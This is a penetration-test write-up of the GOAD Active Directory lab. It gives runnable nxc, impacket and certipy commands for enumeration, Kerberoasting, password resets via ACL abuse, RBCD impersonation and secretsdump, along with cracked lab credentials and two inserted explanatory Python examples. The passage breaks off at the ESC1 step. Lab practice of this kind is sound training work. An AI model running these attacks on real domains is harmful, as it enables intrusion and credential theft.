GOAD: Report

GOAD (Game of Active Directory)

GOAD is an automated Active Directory lab developed by Orange Cyberdefense.
It allows the deployment of realistic multi-domain AD environments with controllers, workstations, and servers using Ansible, Docker, or Ludus, designed for practicing offensive and defensive techniques in corporate Windows infrastructures.

The lab is created and maintained mainly by Cyril Servières (a.k.a. @m4yfly).

I lost all the screenshots because I’m a bit clumsy sometimes…

This is the “OSCP report” made with a colleague some weeks later.


Phase 1 — Host Discovery

1.1 ICMP Sweep

Command:

for i in $(seq 1 254); do ping -c 1 -W 1 10.5.10.$i &>/dev/null && echo "10.5.10.$i - UP"; done

Reasoning: Lightest and most universal starting point; no credentials or prior knowledge needed, and it gives a map of what is alive before sending noisier traffic. Hosts that filter ICMP are missed by this sweep, so a host absent from the list is not proven down; the later port scan is the cross-check.

Active hosts (9 of 254):

| IP | Status |
|----|--------|
| 10.5.10.10 | UP |
| 10.5.10.11 | UP |
| 10.5.10.12 | UP |
| 10.5.10.21 | UP |
| 10.5.10.22 | UP |
| 10.5.10.23 | UP |
| 10.5.10.50 | UP |
| 10.5.10.51 | UP |
| 10.5.10.254 | UP |

Observation: Ranges suggest logical grouping: .10-.12 (group 1), .21-.23 (group 2), .50-.51 (group 3), .254 likely gateway.


Phase 2 — System Identification

2.1 NetExec SMB — Windows system and domain identification

Command:

nxc smb 10.5.10.10 10.5.10.11 10.5.10.12 10.5.10.21 10.5.10.22 10.5.10.23 10.5.10.50 10.5.10.51 10.5.10.254

Reasoning: SMB is the most revealing protocol on Windows networks: the negotiate and session-setup exchange alone yields hostname, domain, OS build, SMB signing requirement and supported protocol versions. A host that does not speak SMB on 445 is most likely not Windows and is treated as Linux/other for the rest of the enumeration.

Results:

| IP | Hostname | Domain | OS | SMB Signing | SMBv1 |
|----|----------|--------|----|-------------|-------|
| 10.5.10.10 | KINGSLANDING | sevenkingdoms.local | Win Server 2019 | Required | No |
| 10.5.10.11 | WINTERFELL | north.sevenkingdoms.local | Win Server 2019 | Required | No |
| 10.5.10.12 | MEEREEN | essos.local | Win Server 2016 | Required | Yes ⚠️ |
| 10.5.10.21 | THE-EYRIE | sevenkingdoms.local | Win Server 2019 | Required | No |
| 10.5.10.22 | CASTELBLACK | north.sevenkingdoms.local | Win Server 2019 | Disabled ⚠️ | No |
| 10.5.10.23 | BRAAVOS | essos.local | Win Server 2019 | Disabled | No |
| 10.5.10.50 | (no SMB response) | - | - | - | - |
| 10.5.10.51 | (no SMB response) | - | - | - | - |
| 10.5.10.254 | (no SMB response) | - | - | - | - |

Critical observations:

  • Multi-domain Active Directory architecture with three domains: sevenkingdoms.local, north.sevenkingdoms.local and essos.local
  • MEEREEN has SMBv1 enabled → potential EternalBlue vector (MS17-010). SMBv1 being on does not by itself mean the host is unpatched; check with nmap --script smb-vuln-ms17-010 before considering exploitation, which can crash the DC
  • CASTELBLACK and BRAAVOS have SMB signing disabled → susceptible to NTLM relay (SMB relay) from any authentication that can be coerced or captured on the network

2.2 Nmap — Full service and OS detection

Command:

nmap -sV -sC -O -T4 --open -oA nmap_initial \
  10.5.10.{10,11,12,21,22,23,50,51,254}

Reasoning: -sV (versions) and -sC (default NSE scripts) offer the best information-to-noise ratio for a first pass. -O adds OS detection. -T4 is viable in a low-latency local lab. Output saved in all formats (-oA) for further processing.

Full results per host:

10.5.10.10 — KINGSLANDING (DC sevenkingdoms.local)

  • OS: Windows Server 2019
  • Role: Domain Controller (Kerberos, LDAP, DNS, Global Catalog)
  • Open ports: 53, 80, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 3389, 5985, 5986
  • Relevant services:
    • HTTP/IIS 10.0 (port 80)
    • Kerberos (88)
    • LDAP / LDAPS (389, 636)
    • Global Catalog (3268, 3269)
    • RDP (3389)
    • WinRM HTTP/HTTPS (5985, 5986)
  • SMB Signing: Required

10.5.10.11 — WINTERFELL (DC north.sevenkingdoms.local)

  • OS: Windows Server 2019
  • Role: Domain Controller
  • Open ports: 88, 135, 139, 389, 445, 464, 636, 3268, 3269, 3389, 5985, 5986
  • SMB Signing: Required
  • NetBIOS Domain: NORTH

10.5.10.12 — MEEREEN (DC essos.local)

  • OS: Windows Server 2016
  • Role: Domain Controller
  • Open ports: 88, 135, 139, 389, 445, 464, 636, 3268, 3269, 3389, 5985, 5986
  • SMB Signing: Required
  • SMBv1: Enabled
  • NetBIOS Domain: ESSOS

10.5.10.21 — THE-EYRIE (Member of sevenkingdoms.local)

  • OS: Windows Server 2019
  • Role: Member server — Exchange / OWA
  • Open ports: 80, 443, 3389, 5985
  • Relevant services:
    • HTTP/IIS 10.0 (80) → redirects to HTTPS
    • HTTPS (443) → Outlook Web App (OWA) — Exchange 2019 version 15.2.858
    • RDP (3389)
    • WinRM (5985)
  • SMB Signing: Required

10.5.10.22 — CASTELBLACK (Member of north.sevenkingdoms.local)

  • OS: Windows Server 2019
  • Role: Member server — Web + MSSQL
  • Open ports: 80, 1433, 3389, 5985
  • Relevant services:
    • HTTP/IIS 10.0 → File upload application at /Default.aspx
    • MSSQL Server 2019 (15.00.2000)
    • RDP (3389)
    • WinRM (5985)
  • SMB Signing: Disabled → NTLM Relay possible

10.5.10.23 — BRAAVOS (Member of essos.local)

  • OS: Windows Server 2019
  • Role: Member server — Web + MSSQL + ADCS
  • Open ports: 80, 1433, 3389, 5985
  • Relevant services:
    • HTTP/IIS 10.0 (80) → default IIS page
    • MSSQL Server 2019
    • Active Directory Certificate Services (ADCS), CertEnroll share exposed over SMB
    • RDP (3389)
    • WinRM (5985)
  • SMB Signing: Disabled

10.5.10.50 — ELK (OUT OF SCOPE)

  • OS: Linux 5.4-5.10 (Ubuntu 22.04)
  • Services: Elasticsearch 7.17.29 (9200, 9300), Kibana (5601), SSH (22)
  • Banner: GOAD0deaa6-elk

10.5.10.51 — Wazuh (OUT OF SCOPE)

  • OS: Linux 5.4-5.10 (Ubuntu 22.04)
  • Services: Wazuh Dashboard HTTPS (443), Wazuh Manager (1514, 55000), SSH (22)
  • Banner: GOAD0deaa6-WAZUH

10.5.10.254 — Gateway

  • OS: Linux 5.4-5.10
  • Role: Lab network router/gateway

Phase 3 — Service and Access Enumeration

3.1 SMB — Anonymous and guest sessions

Command:

nxc smb <targets> -u '' -p '' --shares
nxc smb <targets> -u 'guest' -p '' --shares

Reasoning: Null sessions and the guest account are the first line of unauthenticated enumeration. In modern AD environments they are almost always blocked, but member servers sometimes have more permissive configurations — especially in lab or file-sharing setups.

Results:

| Host | Null session | Guest | Accessible shares |
|------|--------------|-------|-------------------|
| KINGSLANDING | Connection OK, listing denied | Disabled | - |
| WINTERFELL | Connection OK, listing denied | Disabled | - |
| MEEREEN | Connection OK, listing denied | Disabled | - |
| THE-EYRIE | Denied | Disabled | - |
| CASTELBLACK | Denied | Enabled | all (R/W), public (R), IPC$ |
| BRAAVOS | Denied | Enabled | all (R/W), public (R), CertEnroll, IPC$ |

Files found:

  • CASTELBLACK\all\arya.txt (413 bytes) — downloaded

Content of arya.txt:

Subject: Quick Departure

Hey Arya,

I hope this message finds you well. Something urgent has come up, and I have to leave for a while.
I left a little surprise for you in your room – the sword you've named "Needle."

Best,
John

Users inferred from file: arya (Stark) and john/jon (Snow). The sword name "Needle" is an obvious password candidate for arya.stark.

3.2 SMB — RID Brute (local account enumeration)

Command:

nxc smb 10.5.10.22 10.5.10.23 -u 'guest' -p '' --rid-brute

Reasoning: RID brute takes the host's SID (obtained through LSA on the guest session) and asks LSA to resolve SID+RID for sequential RIDs (LsaOpenPolicy / LsaLookupSids). It works as long as a guest session is accepted and the system permits those calls.

Local accounts found (CASTELBLACK and BRAAVOS — identical):

  • Administrator (RID 500)
  • Guest (RID 501)
  • DefaultAccount (RID 503)
  • WDAGUtilityAccount (RID 504)
  • localuser (RID 1000)
  • SQLServer2005SQLBrowserUser$<HOSTNAME> (RID 1001) — SQL Browser service

3.3 Web — HTTP/HTTPS application enumeration

Reasoning: Nmap detected IIS on multiple hosts. In AD environments, web apps often integrate with AD (NTLM/Kerberos authentication), making them interesting attack vectors. Misconfigured or unauthenticated apps may also be present.

| Host | URL | Application | Notes |
|------|-----|-------------|-------|
| KINGSLANDING | http://10.5.10.10/ | IIS default | Default page only |
| THE-EYRIE | https://10.5.10.21/owa/ | OWA, Exchange 2019 (15.2.858) | Outlook Web App login |
| CASTELBLACK | http://10.5.10.22/Default.aspx | File Uploader (ASP.NET) | No authentication |
| BRAAVOS | http://10.5.10.23/ | IIS default | Default page only |

CRITICAL — CASTELBLACK file uploader:

  • URL: http://10.5.10.22/Default.aspx
  • No authentication of any kind
  • multipart/form-data form with FileUpload1
  • Declared destination: upload/ folder
  • Server runs IIS under a domain service account
  • Potential vector: ASPX webshell upload → remote code execution

3.4 LDAP — Directory enumeration

Command:

nxc ldap 10.5.10.{10,11,12} -u '' -p ''

Reasoning: LDAP is the AD database. An anonymous query can reveal users, groups, policies and configurations. On most modern DCs, anonymous bind is permitted but anonymous search is not.

Result: All three DCs accept anonymous bind but require authentication for queries. Without credentials, directory cannot be queried.

3.5 MSSQL — SQL instance enumeration

Command:

nxc mssql 10.5.10.{22,23} -u '' -p ''
nxc mssql 10.5.10.{22,23} -u 'guest' -p ''

CASTELBLACK: MSSQL Server 2019 (15.00.2000), anonymous and guest logins rejected.
BRAAVOS: MSSQL Server 2019, same result (nxc raised an error against BRAAVOS due to an nxc bug).

3.6 Kerberos — User enumeration and AS-REP Roasting

Command:

impacket-GetNPUsers <domain>/ -usersfile /tmp/users_got.txt -no-pass -dc-ip <DC>

Reasoning: Impacket’s GetNPUsers does two things simultaneously:

  1. Enumerates valid users: the KDC responds differently for existing users (KDC_ERR_PREAUTH_REQUIRED) vs non-existing ones (KDC_ERR_C_PRINCIPAL_UNKNOWN)
  2. Detects AS-REP Roasting: if a user has UF_DONT_REQUIRE_PREAUTH set, the KDC returns an AS-REP whose enc-part is encrypted with the user's key without any password being presented; that enc-part can be cracked offline (hashcat mode 18200)
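The two behaviours above, as an added example that is not part of the original report and not impacket's code: a small loop that turns KDC answers into the three verdicts (nonexistent, existing, AS-REP roastable) and derives the hashcat 18200 line from an RC4 AS-REP enc-part. All responses are constructed for the demo (brandon.stark's enc-part is a dummy byte string); nothing is sent to a KDC.

```python
# Added example (not from the original report or from impacket): how a
# GetNPUsers-style loop interprets KDC answers and how the crackable
# "hash" is derived from an AS-REP. All responses below are constructed.

# KRB-ERROR codes, RFC 4120 section 7.5.9
KDC_ERR_C_PRINCIPAL_UNKNOWN = 6    # principal does not exist in the realm
KDC_ERR_CLIENT_REVOKED = 18        # account exists but is disabled or locked
KDC_ERR_PREAUTH_REQUIRED = 25      # account exists, pre-authentication enforced
ETYPE_RC4_HMAC = 23                # etype requested so the AS-REP comes back as RC4

VERDICTS = {
    KDC_ERR_C_PRINCIPAL_UNKNOWN: "nonexistent",
    KDC_ERR_CLIENT_REVOKED: "disabled",
    KDC_ERR_PREAUTH_REQUIRED: "valid",
}


def classify(response):
    """Map one simulated KDC response to a verdict.

    A response with no error is an AS-REP handed out without pre-auth,
    i.e. the account has UF_DONT_REQUIRE_PREAUTH set.
    """
    if response.get("error") is None:
        return "roastable"
    return VERDICTS.get(response["error"], "unknown")


def asrep_hash_line(user, realm, etype, cipher):
    """Format the AS-REP enc-part as a hashcat mode 18200 line.

    For RC4-HMAC (etype 23) the ciphertext starts with a 16-byte HMAC-MD5
    checksum followed by the RC4 stream; the line is
    $krb5asrep$23$<user>@<REALM>:<checksum hex>$<rest hex>
    """
    if etype != ETYPE_RC4_HMAC:
        raise ValueError("only etype 23 (RC4-HMAC) is formatted here")
    if len(cipher) <= 16:
        raise ValueError("enc-part too short to contain a checksum")
    checksum, edata2 = cipher[:16], cipher[16:]
    return f"$krb5asrep$23${user}@{realm.upper()}:{checksum.hex()}${edata2.hex()}"


def enumerate_users(realm, responses):
    """Return (existing users, roastable users, hashcat lines)."""
    existing, roastable, lines = [], [], []
    for user, resp in responses.items():
        verdict = classify(resp)
        if verdict in ("valid", "disabled", "roastable"):
            existing.append(user)
        if verdict == "roastable":
            roastable.append(user)
            lines.append(asrep_hash_line(user, realm, resp["etype"], resp["cipher"]))
    return existing, roastable, lines


# Constructed responses (not real KDC traffic). brandon.stark's enc-part is a
# dummy byte string; a real one is roughly 200 bytes.
SAMPLE_RESPONSES = {
    "arya.stark":    {"error": KDC_ERR_PREAUTH_REQUIRED},
    "brandon.stark": {"error": None, "etype": ETYPE_RC4_HMAC,
                      "cipher": bytes(range(16)) + b"\xaa" * 40},
    "guest":         {"error": KDC_ERR_CLIENT_REVOKED},
    "bran.stark":    {"error": KDC_ERR_C_PRINCIPAL_UNKNOWN},
}

if __name__ == "__main__":
    existing, roastable, lines = enumerate_users("north.sevenkingdoms.local", SAMPLE_RESPONSES)
    print("existing:", existing)
    print("roastable:", roastable)
    for line in lines:
        print(line)
```

A disabled account (KDC_ERR_CLIENT_REVOKED) is still counted as existing, which is exactly the signal used above to confirm that guest is disabled on the DCs.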

Candidate list: 62 GoT-themed names + generic accounts

Confirmed users per domain:

sevenkingdoms.local (DC: KINGSLANDING)

| User | AS-REP Roastable |
|------|------------------|
| administrator | No |
| cersei.lannister | No |
| tywin.lannister | No |
| jaime.lannister | No |
| joffrey.baratheon | No |
| stannis.baratheon | No |

north.sevenkingdoms.local (DC: WINTERFELL)

| User | AS-REP Roastable |
|------|------------------|
| administrator | No |
| arya.stark | No |
| jon.snow | No |
| sansa.stark | No |
| robb.stark | No |
| catelyn.stark | No |
| samwell.tarly | No |
| hodor | No |
| sql_svc | No |

essos.local (DC: MEEREEN)

| User | AS-REP Roastable |
|------|------------------|
| administrator | No |
| daenerys.targaryen | No |
| khal.drogo | No |
| jorah.mormont | No |
| sql_svc | No |

Observation: No user has AS-REP roasting enabled. The guest account on both KINGSLANDING and WINTERFELL returns KDC_ERR_CLIENT_REVOKED (disabled account), confirming what was seen in SMB.


Enumeration Summary

Identified architecture

                    sevenkingdoms.local
                    ┌─────────────────┐
                    │  KINGSLANDING   │  10.5.10.10  DC
                    │  (Windows 2019) │
                    └────────┬────────┘
                             │ trust?
              ┌──────────────┴──────────────┐
              │                             │
   north.sevenkingdoms.local           essos.local
   ┌──────────────────┐            ┌──────────────────┐
   │   WINTERFELL     │ 10.5.10.11 │    MEEREEN       │ 10.5.10.12
   │   (Win 2019) DC  │            │  (Win 2016) DC   │
   └──────────────────┘            └──────────────────┘
   ┌──────────────────┐            ┌──────────────────┐
   │   CASTELBLACK    │ 10.5.10.22 │    BRAAVOS       │ 10.5.10.23
   │   (Win 2019)     │            │  (Win 2019)      │
   └──────────────────┘            └──────────────────┘
              │                             │
   ┌──────────────────┐
   │   THE-EYRIE      │ 10.5.10.21 (sevenkingdoms.local)
   │   Exchange 2019  │
   └──────────────────┘

Identified attack vectors (pending execution)

| # | Vector | Host | Estimated severity | Condition |
|---|--------|------|--------------------|-----------|
| V1 | Unauthenticated file upload → ASPX webshell | CASTELBLACK (10.5.10.22) | Critical | No credentials required |
| V2 | SMB Relay (NTLM Relay) | CASTELBLACK, BRAAVOS | High | Requires an NTLM authentication to relay |
| V3 | SMBv1 / EternalBlue (MS17-010) | MEEREEN (10.5.10.12) | Critical | Verify patch level first; DoS risk, approval required |
| V4 | ADCS, ESC attacks | BRAAVOS (10.5.10.23) | High/Critical | Requires credentials |
| V5 | OWA password spray / ProxyLogon | THE-EYRIE (10.5.10.21) | High | No credentials required |
| V6 | MSSQL credential brute / xp_cmdshell | CASTELBLACK, BRAAVOS | High | Requires credentials |
| V7 | Kerberoasting | All domains | Medium | Requires credentials |

Confirmed domain users (20 entries across the three domains)

sevenkingdoms.local: administrator, cersei.lannister, tywin.lannister, jaime.lannister, joffrey.baratheon, stannis.baratheon

north.sevenkingdoms.local: administrator, arya.stark, jon.snow, sansa.stark, robb.stark, catelyn.stark, samwell.tarly, hodor, sql_svc

essos.local: administrator, daenerys.targaryen, khal.drogo, jorah.mormont, sql_svc

Confirmed local accounts: localuser (on CASTELBLACK and BRAAVOS)


Scope — Pending confirmation

| Host | Role | In scope |
|------|------|----------|
| 10.5.10.10 KINGSLANDING | DC sevenkingdoms.local | Pending |
| 10.5.10.11 WINTERFELL | DC north.sevenkingdoms.local | Pending |
| 10.5.10.12 MEEREEN | DC essos.local | Pending |
| 10.5.10.21 THE-EYRIE | Exchange 2019 | Pending |
| 10.5.10.22 CASTELBLACK | Web + MSSQL | Pending |
| 10.5.10.23 BRAAVOS | Web + MSSQL + ADCS | Pending |
| 10.5.10.50 ELK | SIEM | Out of scope |
| 10.5.10.51 Wazuh | SIEM | Out of scope |
| 10.5.10.254 | Gateway | Pending |


Phase 4 — Authenticated Enumeration (arya.stark:Needle)

4.1 LDAP Users — north.sevenkingdoms.local (WINTERFELL)

Command:

nxc ldap 10.5.10.11 -u arya.stark -p Needle --users

Critical finding — password in description field:

  • samwell.tarly → description: Samwell Tarly (Password : Heartsbane)

Full user list north.sevenkingdoms.local (16): Administrator, Guest, localuser, krbtgt, arya.stark, eddard.stark, catelyn.stark, robb.stark, sansa.stark, brandon.stark, rickon.stark, hodor, jon.snow, samwell.tarly, jeor.mormont, sql_svc

Relevant groups (NORTH):

  • Stark (9 members)
  • Night Watch (3 members)
  • Mormont (1 member)
  • AcrossTheSea (0 members)
  • Domain Admins (2 members)

4.2 LDAP Users — sevenkingdoms.local (KINGSLANDING, via trust)

Users (38 total, including Exchange accounts): Administrator, Guest, localuser, krbtgt, tywin.lannister, jaime.lannister, cersei.lannister, tyron.lannister, robert.baratheon, joffrey.baratheon, renly.baratheon, stannis.baratheon, petyer.baelish, lord.varys, maester.pycelle, lysa.arryn, robin.arryn + SM_* and HealthMailbox* accounts (Exchange)

4.3 LDAP Users — essos.local (MEEREEN, via trust)

Users (12): Administrator, Guest, DefaultAccount, localuser, krbtgt, daenerys.targaryen, viserys.targaryen, khal.drogo, jorah.mormont, missandei, drogon, sql_svc

4.4 Kerberoasting — north.sevenkingdoms.local

Command:

nxc ldap 10.5.10.11 -u arya.stark -p Needle --kerberoasting

SPNs found (3 Kerberoastable accounts):

| User | Groups | Result |
|------|--------|--------|
| jon.snow | Night Watch, Stark | Hash cracked: iknownothing |
| sansa.stark | Stark | Hash not cracked |
| sql_svc | - | Hash not cracked |

Cracking with hashcat (GoT wordlist + rockyou):

  • jon.snow → iknownothing ✓ (iconic Jon Snow phrase)
  • sansa.stark → pending
  • sql_svc → pending

4.5 NETLOGON — Scripts with credentials

Files found in NETLOGON/SYSVOL on WINTERFELL:

  • script.ps1 (165B)
  • secret.ps1 (869B)

script.ps1 — cleartext credentials:

$user = "NORTH\jeor.mormont"
$password = "_L0ngCl@w_"

Comment in file: # passwords in sysvol still ...

secret.ps1 — AES-encrypted secret, decrypted:

The file contained a SecureString encrypted with AES-256-CBC and an embedded key:

  • Key: 32 hardcoded bytes in the script
  • IV: extracted from the payload
  • Decrypted plaintext: powerkingftw135
  • Signed: T.L. → Tywin Lannister (sevenkingdoms.local)

Accumulated Valid Credentials

| User | Password | Domain | Source | Shell access |
|------|----------|--------|--------|--------------|
| arya.stark | Needle | north.sevenkingdoms.local | SMB share (arya.txt) | - |
| samwell.tarly | Heartsbane | north.sevenkingdoms.local | LDAP description field | - |
| jon.snow | iknownothing | north.sevenkingdoms.local | Kerberoasting | - |
| jeor.mormont | _L0ngCl@w_ | north.sevenkingdoms.local | NETLOGON script.ps1 | WinRM CASTELBLACK (Pwn3d!) |
| tywin.lannister | powerkingftw135 | sevenkingdoms.local | NETLOGON secret.ps1 (AES decrypt) | SMB THE-EYRIE |

Confirmed Shell Access

| Host | Method | User | Status |
|------|--------|------|--------|
| CASTELBLACK (10.5.10.22) | WinRM (5985) | jeor.mormont | Interactive shell available |

Phase 5 — ACL Exploitation (Attack Path A)

5.1 ForceChangePassword: tywin.lannister → jaime.lannister

Reasoning: BloodHound confirmed that tywin.lannister has ForceChangePassword over jaime.lannister. This right (the User-Force-Change-Password extended right) lets the holder reset a user's password without knowing the current one, through the SAMR SetUserInfo password-reset call rather than ChangePasswordUser, which requires the old password. No target credentials are required. The reset replaces the victim's password, which the user will notice and which may break services running under that account, so it is done only with RoE approval.

Command:

net rpc password jaime.lannister 'Kingslayer1!' \
  -U 'sevenkingdoms.local/tywin.lannister%powerkingftw135' -S 10.5.10.10

Result: jaime.lannister:Kingslayer1!

5.2 Targeted Kerberoasting: jaime.lannister → joffrey.baratheon

Reasoning: jaime.lannister has GenericWrite over joffrey.baratheon. With GenericWrite, the servicePrincipalName attribute can be written on the target account even if it has no prior SPN. Once a fake SPN is set, the KDC issues a TGS for it encrypted with joffrey's key (RC4 with the NT hash if that etype is requested), which can be cracked offline. This is “Targeted Kerberoasting”: no interaction with the target user is required. targetedKerberoast.py adds the SPN, requests the ticket and then removes the SPN it added, so the object is left as it was found.

Tool: targetedKerberoast.py (ShutdownRepo)

python3 targetedKerberoast.py -d sevenkingdoms.local \
  -u jaime.lannister -p 'Kingslayer1!' --dc-ip 10.5.10.10 -o hash.txt

Hash cracked with rockyou: joffrey.baratheon:1killerlion

5.3 WriteDacl abuse: joffrey.baratheon → tyron.lannister

Reasoning: joffrey.baratheon has WriteDacl over tyron.lannister. WriteDacl allows modifying the DACL of the target object, which is equivalent to granting yourself any right over it. dacledit.py from Impacket is used to write a FullControl ACE, then the password of tyron is changed.

Commands:

# 1. Write FullControl ACE
impacket-dacledit -action write -rights FullControl \
  -principal joffrey.baratheon \
  -target-dn "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local" \
  'sevenkingdoms.local/joffrey.baratheon:1killerlion' -dc-ip 10.5.10.10

# 2. Change password
net rpc password tyron.lannister 'Halfman1!' \
  -U 'sevenkingdoms.local/joffrey.baratheon%1killerlion' -S 10.5.10.10

Result: tyron.lannister:Halfman1!

5.4 ACL abuse chain summary

tywin.lannister (had credentials)
  --[ForceChangePassword]--> jaime.lannister     (pass: Kingslayer1!)
  --[GenericWrite / TargetedKerberoast]--> joffrey.baratheon  (pass: 1killerlion)
  --[WriteDacl → FullControl]--> tyron.lannister (pass: Halfman1!)

Next impact: tyron.lannister is a member of DRAGONSFRIENDS@essos.local (ForeignSecurityPrincipal), a group with GenericWrite over the BRAAVOS.essos.local computer → cross-domain RBCD vector.


Phase 6 — Cross-Domain RBCD + BRAAVOS Compromise

6.1 RBCD Attack (Resource-Based Constrained Delegation)

Reasoning: tyron.lannister (sevenkingdoms.local) is a ForeignSecurityPrincipal member of DRAGONSFRIENDS@essos.local. That group has GenericWrite over the BRAAVOS$ computer object. GenericWrite allows writing the msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which is the basis of RBCD: it specifies which accounts can use S4U2Proxy to impersonate any user against that computer.
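What an RBCD write actually puts in msDS-AllowedToActOnBehalfOfOtherIdentity, as an added example that is not part of the original report and not impacket's code: the security descriptor in SDDL form, one allow ACE per delegate, plus a merge step so an existing descriptor is extended rather than overwritten. The FAKEMACHINE$ SID is hypothetical (RID 1200 under the essos.local domain SID that appears in the BloodHound session table); the rights string is the 0xF01FF access mask that impacket's rbcd.py writes.

```python
# Added example (not from the original report or from impacket): the RBCD
# security descriptor in SDDL form, with an append-instead-of-overwrite merge.
# The FAKEMACHINE$ SID below is hypothetical.
import re

# One ACE per delegate. The rights string encodes access mask 0xF01FF, which is
# what impacket's rbcd.py writes; only the SID in the ACE matters to the KDC.
RBCD_ACE_RIGHTS = "CCDCLCSWRPWPDTLOCRSDRCWDWO"
RIGHT_BITS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
}
# Only allow ACEs carrying a domain SID are collected here.
ACE_RE = re.compile(r"\(A;;([A-Z]*);;;(S-1-5-21-[0-9-]+)\)")


def rights_mask(rights: str) -> int:
    """Convert a two-letter SDDL rights string into its access mask."""
    return sum(RIGHT_BITS[rights[i:i + 2]] for i in range(0, len(rights), 2))


def parse_rbcd_sddl(sddl):
    """Return the delegate SIDs in an existing descriptor ('' or None means empty)."""
    if not sddl:
        return []
    return [m.group(2) for m in ACE_RE.finditer(sddl)]


def build_rbcd_sddl(sids):
    """Build the descriptor: owner BUILTIN\\Administrators, one allow ACE per SID."""
    aces = "".join(f"(A;;{RBCD_ACE_RIGHTS};;;{sid})" for sid in sids)
    return f"O:BAD:{aces}"


def add_delegate(existing_sddl, new_sid):
    """Append new_sid, keeping delegates already present.

    Flushing the attribute would break legitimate delegation on the target and
    is a louder change than appending one ACE.
    """
    sids = parse_rbcd_sddl(existing_sddl)
    if new_sid not in sids:
        sids.append(new_sid)
    return build_rbcd_sddl(sids)


def can_act_on_behalf(sddl, sid):
    """True if sid may run S4U2Proxy against the computer owning this attribute."""
    return sid in parse_rbcd_sddl(sddl)


if __name__ == "__main__":
    fake = "S-1-5-21-1670807799-439666968-3082400961-1200"  # hypothetical FAKEMACHINE$
    sd = add_delegate(None, fake)
    print(sd)
    print(can_act_on_behalf(sd, fake))
```

The attribute is stored in binary security-descriptor form, so a tool converts this SDDL to bytes before the LDAP modify; the SID is the only part the KDC consults when validating S4U2Proxy. Reading the attribute first and appending is also what to do during cleanup: remove only the ACE that was added.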

Steps executed:

# 1. Create fake computer account (MachineAccountQuota=10)
impacket-addcomputer -computer-name 'FAKEMACHINE$' -computer-pass 'FakeMachine123!' \
  -dc-ip 10.5.10.12 'north.sevenkingdoms.local/arya.stark:Needle'

# 2. Write msDS-AllowedToActOnBehalfOfOtherIdentity on BRAAVOS$
impacket-rbcd -delegate-from 'FAKEMACHINE$' -delegate-to 'BRAAVOS$' \
  -action write -dc-ip 10.5.10.12 \
  'sevenkingdoms.local/tyron.lannister:Halfman1!'

# 3. S4U2Self + S4U2Proxy → ticket as Administrator@essos.local against BRAAVOS
impacket-getST -spn 'cifs/braavos.essos.local' -impersonate Administrator \
  -dc-ip 10.5.10.12 'essos.local/FAKEMACHINE$:FakeMachine123!'

# 4. Use the Kerberos ticket
export KRB5CCNAME=Administrator@cifs_braavos.essos.local@ESSOS.LOCAL.ccache
impacket-secretsdump -k -no-pass -dc-ip 10.5.10.12 braavos.essos.local

Result: Full secrets dump from BRAAVOS as Administrator.

6.2 Credentials obtained from BRAAVOS

| Type | Account | Value |
|------|---------|-------|
| SAM (local) | Administrator | NTLM: 244483aca7de8a1800539b76e5e42f22 |
| SAM (local) | localuser | password (DefaultPassword in LSA) |
| LSA secret _SC_MSSQL$SQLEXPRESS | essos\sql_svc | YouWillNotKerboroast1ngMeeeeee |
| Domain cache | ESSOS\Administrator | DCC2 hash |
| Domain cache | ESSOS\sql_svc | DCC2 hash |

Critical finding: The MSSQL service password is stored in cleartext in LSA secrets under _SC_<service name>. This is normal Windows behavior for any service configured to run as a domain account: the Service Control Manager needs the password to start the service, so every local administrator on the host can recover it. Any host running a service as a domain account must therefore be treated as holding that account's credentials (a gMSA avoids this exposure).

6.3 Confirmed shell access on BRAAVOS

| Method | User | Status |
|--------|------|--------|
| SMB PTH | BRAAVOS\Administrator (local) | Pwn3d! |
| WinRM PTH | BRAAVOS\Administrator (local) | Pwn3d! |
| MSSQL xp_cmdshell | essos\sql_svc | Pwn3d! (whoami = essos\sql_svc) |

6.4 Lateral movement — sql_svc valid on CASTELBLACK

sql_svc:YouWillNotKerboroast1ngMeeeeee is also valid on CASTELBLACK (north.sevenkingdoms.local) → Pwn3d! on MSSQL.


Accumulated Valid Credentials (updated)

| User | Password / NT hash | Domain | Source | Shell access |
|------|--------------------|--------|--------|--------------|
| arya.stark | Needle | NORTH | SMB share (arya.txt) | - |
| samwell.tarly | Heartsbane | NORTH | LDAP description | - |
| jon.snow | iknownothing | NORTH | Kerberoasting | - |
| jeor.mormont | _L0ngCl@w_ | NORTH | NETLOGON script.ps1 | WinRM CASTELBLACK |
| tywin.lannister | powerkingftw135 | SEVEN | NETLOGON secret.ps1 (AES) | SMB THE-EYRIE |
| jaime.lannister | Kingslayer1! | SEVEN | ForceChangePassword (tywin) | - |
| joffrey.baratheon | 1killerlion | SEVEN | Targeted Kerberoast (jaime) | - |
| tyron.lannister | Halfman1! | SEVEN | WriteDacl (joffrey) | - |
| BRAAVOS\Administrator | NTLM: 244483aca7de8a1800539b76e5e42f22 | LOCAL | RBCD + secretsdump | PTH → BRAAVOS |
| sql_svc | YouWillNotKerboroast1ngMeeeeee | ESSOS/NORTH | LSA secret BRAAVOS | MSSQL BRAAVOS + CASTELBLACK |
| localuser | password | LOCAL | LSA DefaultPassword | - |

Phase 7 — ADCS ESC1 → Domain Admin essos.local

7.1 ADCS enumeration with certipy

Command:

certipy-ad find -u 'sql_svc@essos.local' -p 'YouWillNotKerboroast1ngMeeeeee' \
  -dc-ip 10.5.10.12 -stdout -vulnerable

CA identified: ESSOS-CA on braavos.essos.local

Vulnerabilities found:

| Level | Type | Description |
|-------|------|-------------|
| CA | ESC6 | EDITF_ATTRIBUTESUBJECTALTNAME2 enabled: any template allows a custom SAN |
| CA | ESC8 | Web Enrollment over HTTP enabled |
| CA | ESC11 | No encryption required on RPC/ICPR requests |
| Template ESC1 | ESC1 | Enrollee supplies subject + Client Auth EKU + no manager approval |
| Template ESC2 | ESC2 | Any Purpose EKU |
| Template ESC3-CRA | ESC3 | Certificate Request Agent EKU |
| Template ESC9 | ESC9 | NoSecurityExtension flag |
| Template WebServer | ESC15 | Schema v1 + Enrollee supplies subject (CVE-2024-49019) |

All Domain Users can enroll in ESC1/ESC2/ESC3/ESC9 templates.

7.2 ESC1 exploitation — Certificate request as Administrator

